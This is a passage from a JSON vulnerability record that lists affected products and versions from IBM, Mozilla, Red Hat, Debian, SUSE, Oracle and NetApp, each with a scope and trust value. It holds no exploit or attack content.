authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.1.2" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "elastic storage server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "websphere real time", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "tivoli network manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8" }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.1" }, { "model": "1/10gb uplink ethernet switch module", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.4.14.0" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.5" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0" }, { "model": "rational synergy ifix02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.3" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.3" }, { "model": "filenet content manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.13" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v50007.6.0.3" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v70007.4.0.7" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.4" }, { "model": "spss modeler fp3 if011", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "15" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.15.5" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.7" }, { "model": "marketing platform", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.5" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.6" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4" }, { "model": "system networking rackswitch g8124", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.11.6.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.10" }, { "model": "qradar incident forensics", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "linux enterprise module for legacy software", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "12" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.11" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.11" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.23" }, { "model": "sterling external authentication server ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.46" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.21" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.10" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.44" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.9" }, { "model": "web experience factory", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.12" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.4" }, { "model": "tivoli storage manager operations center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.200" }, { "model": "data studio client", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "watson explorer foundational components", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.0.0" }, { "model": "rational method composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "15.0.1" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "38.3" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.2" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.8" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2.0.5" }, { "model": "smartcloud entry jre update", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.55" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.12" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.212" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "16.0" }, { "model": "snapcenter server", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.2" }, { "model": "sterling control center ifix04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.2.1" }, { "model": "enterprise linux desktop optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "39" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.17" }, { "model": "security appscan enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.8" }, { "model": "enterprise linux hpc node supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop supplementary client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.3" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1.0.7" }, { "model": "security network intrusion prevention system gx5108", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "websphere real time sr fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3810" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.2" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.5" }, { "model": "rational developer for aix and cobol", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.9" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.0.10" }, { "model": "domino fp if", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.132" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.14.1" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "sterling control center ifix03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.1.0" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.1.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.021" }, { "model": "websphere partner gateway advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1.4" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.2" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.16.5" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "34" }, { "model": "contact optimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "websphere mq internet pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.2" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.302" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.12" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.3" }, { "model": "system networking rackswitch g8264", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.11.5.0" }, { "model": "security appscan source", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.2" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7.1.1" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.9" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.4" }, { "model": "sterling secure proxy ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.0.67" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "29.0.1" }, { "model": "cplex optimization studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "12.5.0.1" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.02" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "firefox esr", "scope": "ne", "trust": 0.3, "vendor": "mozilla", "version": "38.5.2" }, { "model": "system networking switch center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.4" }, { "model": "infosphere data architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.20.1" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "sterling control center ifix02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.34" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.6" }, { "model": "tivoli netcool configuration manager if001", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.1.3" }, { "model": "security access manager for web appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.1" }, { "model": "rational developer for aix and cobol", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.12" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.1.3" }, { "model": "contact optimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.029" }, { "model": "integrated management module ii for system 1aoo70h-5.40", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "x" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.6" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.2" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.7.1" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "36.0.4" }, { "model": "ilog optimization decision manager enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.24" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "cplex enterprise server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "12.4.0.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.4" }, { "model": "rlks administration and reporting tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4.6" }, { "model": "spss collaboration and deployment services", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "infosphere optim query workload tuner for db2 for luw", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.2" }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.6" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.28" }, { "model": "watson content analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.14.4" }, { "model": "directory server enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.7" }, { "model": "fibre channel switch", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.7" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.9" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "22.0" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "watson content analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.6" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "37.0.2" }, { "model": "qradar siem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.11" }, { "model": "system networking switch center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.0" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.52" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.01" }, { "model": "marketing operations", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "40" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "33" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "system networking rackswitch g8264cs", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.12.0" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.4" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.0.3" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.27" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.1" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.12.1" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.1" }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.6" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.1.6" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.10.1" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.3" }, { "model": "spss collaboration and deployment services", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.3" }, { "model": "system networking rackswitch g8124-e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.11.5.0" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.15.4" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.1" }, { "model": "cloud manager with openstack interix fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.3" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.7" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.4" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v37007.5.0.6" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.0.13" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "18.0.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.0.2" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.2" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7.0.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.13" }, { "model": "rational policy tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.1" }, { "model": "rational developer for c/c++", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.3" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.24" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.13.4" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1.0" }, { "model": "tivoli netcool configuration manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.2.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "31.1.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "8.0.1" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.1" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.0" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.3" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.19" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.7" }, { "model": "websphere partner gateway enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1" }, { "model": "websphere application server for bluemix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.4" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "rational policy tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.3" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.33" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "24.1" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.3" }, { "model": "bundle of g8264cs image", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.13.0" }, { "model": "os image for aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.31" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.0.2" }, { "model": "enterprise linux supplementary server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "web experience factory", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.14" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "26.0" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.10" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "qradar incident forensics patch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2.62" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.5" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.0" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v37007.6.0.3" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.12.3" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.10" }, { "model": "system networking rackswitch g8264t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.15.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.23" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.1" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.4" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "16.0.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.17" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.26" }, { "model": "gpfs storage server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.4" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "24.6" }, { "model": "omnifind enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.5" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.1" }, { "model": "rational developer for aix and cobol", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1.2" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.16.2.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.13" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.9.2" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.8" }, { "model": "os image for red hat", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.0.1" 